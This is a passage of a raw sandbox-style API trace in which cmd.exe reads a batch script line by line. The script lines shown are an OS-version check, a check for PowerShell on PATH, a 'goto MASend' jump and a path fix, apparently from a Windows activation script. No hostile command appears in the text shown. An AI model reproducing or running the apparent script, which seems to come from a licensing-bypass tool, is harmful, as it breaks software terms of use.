lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.430] SetFilePointer (in: hFile=0xac, lDistanceToMove=3853, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf0d [0176.430] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\nt \"eline=echo: &call :_color %Red% \"==== ERROR ====\" &echo:\"\r\n") returned 2 [0176.430] _get_osfhandle (_FileHandle=3) returned 0xac [0176.430] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf0d [0176.430] _get_osfhandle (_FileHandle=3) returned 0xac [0176.431] GetFileType (hFile=0xac) returned 0x1 [0176.431] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf0d [0176.431] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.431] SetFilePointer (in: hFile=0xac, lDistanceToMove=3993, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf99 [0176.431] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="::========================================================================================================================================\r\n", cbMultiByte=140, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="::========================================================================================================================================\r\nbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\\"") returned 140 [0176.431] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.431] _get_osfhandle (_FileHandle=3) returned 0xac [0176.431] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf99 [0176.431] _get_osfhandle (_FileHandle=3) returned 0xac [0176.431] GetFileType (hFile=0xac) returned 0x1 [0176.431] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf99 [0176.431] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.431] SetFilePointer (in: hFile=0xac, lDistanceToMove=3995, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf9b [0176.431] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\n========================================================================================================================================\r\n") returned 2 [0176.431] _get_osfhandle (_FileHandle=3) returned 0xac [0176.431] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf9b [0176.431] _get_osfhandle (_FileHandle=3) returned 0xac [0176.431] GetFileType (hFile=0xac) returned 0x1 [0176.431] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf9b [0176.432] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.432] SetFilePointer (in: hFile=0xac, lDistanceToMove=4021, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xfb5 [0176.432] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if %winbuild% LSS 7600 (\r\n", cbMultiByte=26, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if %winbuild% LSS 7600 (\r\n================================================================================================================\r\n") returned 26 [0176.432] _get_osfhandle (_FileHandle=3) returned 0xac [0176.432] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xfb5 [0176.432] _get_osfhandle (_FileHandle=3) returned 0xac [0176.432] GetFileType (hFile=0xac) returned 0x1 [0176.432] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xfb5 [0176.432] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.432] SetFilePointer (in: hFile=0xac, lDistanceToMove=4032, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xfc0 [0176.432] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="%nceline%\r\n", cbMultiByte=11, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="%nceline%\r\nd% LSS 7600 (\r\n") returned 11 [0176.432] _get_osfhandle (_FileHandle=3) returned 0xac [0176.432] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xfc0 [0176.432] _get_osfhandle (_FileHandle=3) returned 0xac [0176.432] GetFileType (hFile=0xac) returned 0x1 [0176.432] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xfc0 [0176.432] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.433] SetFilePointer (in: hFile=0xac, lDistanceToMove=4084, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xff4 [0176.433] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo Unsupported OS version detected [%winbuild%].\r\n", cbMultiByte=52, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo Unsupported OS version detected [%winbuild%].\r\n======================================================================================\r\n") returned 52 [0176.433] _get_osfhandle (_FileHandle=3) returned 0xac [0176.433] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xff4 [0176.433] _get_osfhandle (_FileHandle=3) returned 0xac [0176.433] GetFileType (hFile=0xac) returned 0x1 [0176.433] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xff4 [0176.433] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.433] SetFilePointer (in: hFile=0xac, lDistanceToMove=4171, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x104b [0176.433] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo Project is supported only for Windows 7/8/8.1/10/11 and their Server equivalent.\r\n", cbMultiByte=87, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo Project is supported only for Windows 7/8/8.1/10/11 and their Server equivalent.\r\n===================================================\r\n") returned 87 [0176.433] _get_osfhandle (_FileHandle=3) returned 0xac [0176.433] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x104b [0176.433] _get_osfhandle (_FileHandle=3) returned 0xac [0176.433] GetFileType (hFile=0xac) returned 0x1 [0176.433] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x104b [0176.433] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.433] SetFilePointer (in: hFile=0xac, lDistanceToMove=4184, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1058 [0176.433] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="goto MASend\r\n", cbMultiByte=13, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="goto MASend\r\nis supported only for Windows 7/8/8.1/10/11 and their Server equivalent.\r\n") returned 13 [0176.433] _get_osfhandle (_FileHandle=3) returned 0xac [0176.434] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1058 [0176.434] _get_osfhandle (_FileHandle=3) returned 0xac [0176.434] GetFileType (hFile=0xac) returned 0x1 [0176.434] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1058 [0176.434] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.434] SetFilePointer (in: hFile=0xac, lDistanceToMove=4187, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x105b [0176.434] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=")\r\n", cbMultiByte=3, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr=")\r\no MASend\r\n") returned 3 [0176.434] _get_osfhandle (_FileHandle=3) returned 0xac [0176.434] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x105b [0176.434] _get_osfhandle (_FileHandle=3) returned 0xac [0176.434] GetFileType (hFile=0xac) returned 0x1 [0176.434] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x105b [0176.434] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.434] SetFilePointer (in: hFile=0xac, lDistanceToMove=4189, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x105d [0176.434] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\n\n") returned 2 [0176.434] _get_osfhandle (_FileHandle=3) returned 0xac [0176.434] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x105d [0176.434] _get_osfhandle (_FileHandle=3) returned 0xac [0176.434] GetFileType (hFile=0xac) returned 0x1 [0176.434] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x105d [0176.435] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.435] SetFilePointer (in: hFile=0xac, lDistanceToMove=4244, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1094 [0176.435] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="for %%# in (powershell.exe) do @if \"%%~$PATH:#\"==\"\" (\r\n", cbMultiByte=55, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="for %%# in (powershell.exe) do @if \"%%~$PATH:#\"==\"\" (\r\n1 and their Server equivalent.\r\n") returned 55 [0176.435] _get_osfhandle (_FileHandle=3) returned 0xac [0176.435] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1094 [0176.435] _get_osfhandle (_FileHandle=3) returned 0xac [0176.435] GetFileType (hFile=0xac) returned 0x1 [0176.435] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1094 [0176.435] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.435] SetFilePointer (in: hFile=0xac, lDistanceToMove=4255, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x109f [0176.435] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="%nceline%\r\n", cbMultiByte=11, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="%nceline%\r\n(powershell.exe) do @if \"%%~$PATH:#\"==\"\" (\r\n") returned 11 [0176.435] _get_osfhandle (_FileHandle=3) returned 0xac [0176.435] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x109f [0176.435] _get_osfhandle (_FileHandle=3) returned 0xac [0176.435] GetFileType (hFile=0xac) returned 0x1 [0176.435] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x109f [0176.435] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.435] SetFilePointer (in: hFile=0xac, lDistanceToMove=4306, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x10d2 [0176.436] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo Unable to find powershell.exe in the system.\r\n", cbMultiByte=51, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo Unable to find powershell.exe in the system.\r\n (\r\n") returned 51 [0176.436] _get_osfhandle (_FileHandle=3) returned 0xac [0176.436] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x10d2 [0176.436] _get_osfhandle (_FileHandle=3) returned 0xac [0176.436] GetFileType (hFile=0xac) returned 0x1 [0176.436] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x10d2 [0176.436] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.436] SetFilePointer (in: hFile=0xac, lDistanceToMove=4324, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x10e4 [0176.436] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo Aborting...\r\n", cbMultiByte=18, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo Aborting...\r\nd powershell.exe in the system.\r\n") returned 18 [0176.436] _get_osfhandle (_FileHandle=3) returned 0xac [0176.436] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x10e4 [0176.436] _get_osfhandle (_FileHandle=3) returned 0xac [0176.436] GetFileType (hFile=0xac) returned 0x1 [0176.436] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x10e4 [0176.436] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.436] SetFilePointer (in: hFile=0xac, lDistanceToMove=4337, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x10f1 [0176.436] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="goto MASend\r\n", cbMultiByte=13, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="goto MASend\r\n...\r\n") returned 13 [0176.436] _get_osfhandle (_FileHandle=3) returned 0xac [0176.436] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x10f1 [0176.436] _get_osfhandle (_FileHandle=3) returned 0xac [0176.436] GetFileType (hFile=0xac) returned 0x1 [0176.436] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x10f1 [0176.436] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.437] SetFilePointer (in: hFile=0xac, lDistanceToMove=4340, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x10f4 [0176.437] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=")\r\n", cbMultiByte=3, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr=")\r\no MASend\r\n") returned 3 [0176.437] _get_osfhandle (_FileHandle=3) returned 0xac [0176.437] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x10f4 [0176.437] _get_osfhandle (_FileHandle=3) returned 0xac [0176.437] GetFileType (hFile=0xac) returned 0x1 [0176.437] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x10f4 [0176.437] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.437] SetFilePointer (in: hFile=0xac, lDistanceToMove=4342, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x10f6 [0176.437] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\n\n") returned 2 [0176.437] _get_osfhandle (_FileHandle=3) returned 0xac [0176.437] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x10f6 [0176.437] _get_osfhandle (_FileHandle=3) returned 0xac [0176.437] GetFileType (hFile=0xac) returned 0x1 [0176.437] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x10f6 [0176.437] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.437] SetFilePointer (in: hFile=0xac, lDistanceToMove=4482, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1182 [0176.437] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="::========================================================================================================================================\r\n", cbMultiByte=140, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="::========================================================================================================================================\r\n") returned 140 [0176.437] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.437] _get_osfhandle (_FileHandle=3) returned 0xac [0176.437] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1182 [0176.437] _get_osfhandle (_FileHandle=3) returned 0xac [0176.438] GetFileType (hFile=0xac) returned 0x1 [0176.438] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1182 [0176.438] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.438] SetFilePointer (in: hFile=0xac, lDistanceToMove=4484, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1184 [0176.438] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\n========================================================================================================================================\r\n") returned 2 [0176.438] _get_osfhandle (_FileHandle=3) returned 0xac [0176.438] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1184 [0176.438] _get_osfhandle (_FileHandle=3) returned 0xac [0176.438] GetFileType (hFile=0xac) returned 0x1 [0176.438] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1184 [0176.438] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.438] SetFilePointer (in: hFile=0xac, lDistanceToMove=4536, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x11b8 [0176.438] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=":: Fix special characters limitation in path name\r\n", cbMultiByte=52, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr=":: Fix special characters limitation in path name\r\n======================================================================================\r\n") returned 52 [0176.438] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.438] _get_osfhandle (_FileHandle=3) returned 0xac [0176.438] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x11b8 [0176.439] _get_osfhandle (_FileHandle=3) returned 0xac [0176.439] GetFileType (hFile=0xac) returned 0x1 [0176.439] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x11b8 [0176.439] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.439] SetFilePointer (in: hFile=0xac, lDistanceToMove=4538, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x11ba [0176.439] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\n Fix special characters limitation in path name\r\n") returned 2 [0176.439] _get_osfhandle (_FileHandle=3) returned 0xac [0176.439] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x11ba [0176.439] _get_osfhandle (_FileHandle=3) returned 0xac [0176.439] GetFileType (hFile=0xac) returned 0x1 [0176.439] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x11ba [0176.439] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.439] SetFilePointer (in: hFile=0xac, lDistanceToMove=4557, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x11cd [0176.439] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set \"_work=%~dp0\"\r\n", cbMultiByte=19, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="set \"_work=%~dp0\"\r\nracters limitation in path name\r\n") returned 19 [0176.439] _get_osfhandle (_FileHandle=3) returned 0xac [0176.439] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x11cd [0176.439] _get_osfhandle (_FileHandle=3) returned 0xac [0176.439] GetFileType (hFile=0xac) returned 0x1 [0176.439] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x11cd [0176.439] ReadFile (in: 